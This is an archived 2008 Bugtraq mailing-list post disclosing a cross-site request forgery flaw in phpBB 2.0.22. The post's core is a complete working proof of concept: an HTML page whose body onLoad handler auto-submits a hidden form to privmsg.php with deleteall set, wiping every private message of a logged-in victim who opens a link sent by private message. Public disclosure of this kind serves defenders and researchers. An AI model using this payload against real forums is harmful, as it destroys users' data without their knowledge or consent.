| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200801232128.59126.nbbn@gmx.net> Date: Wed, 23 Jan 2008 21:28:59 +0100 From: nbbn@....net To: bugtraq@...urityfocus.com Subject: phpBB 2.0.22 Remote PM Delete XSRF Vulnerability ################################################################ phpBB 2.0.22 Remote PM Delete XSRF Vulnerability by NBBN Type: Cross-Site Request Forgery Founded: December 2007 ################################################################ An attacker can send a link via pm to a site with the follow html code to a victim and all victim's pm's are going to be deleted when he click the link. ######Code########################################################## <html> <head> </head> <body onLoad=javascript:document.xsrf.submit()> <form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post" name="xsrf"> <input type="hidden" name="mode" value="" /> <input type="hidden" name="deleteall" value="true" /> <input type="hidden" name="confirm" value="Yes"> </body> </html> ##################################################################### ######Vuln Versions:##################### I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. (Sorry my bad english :-) )
Powered by blists - more mailing lists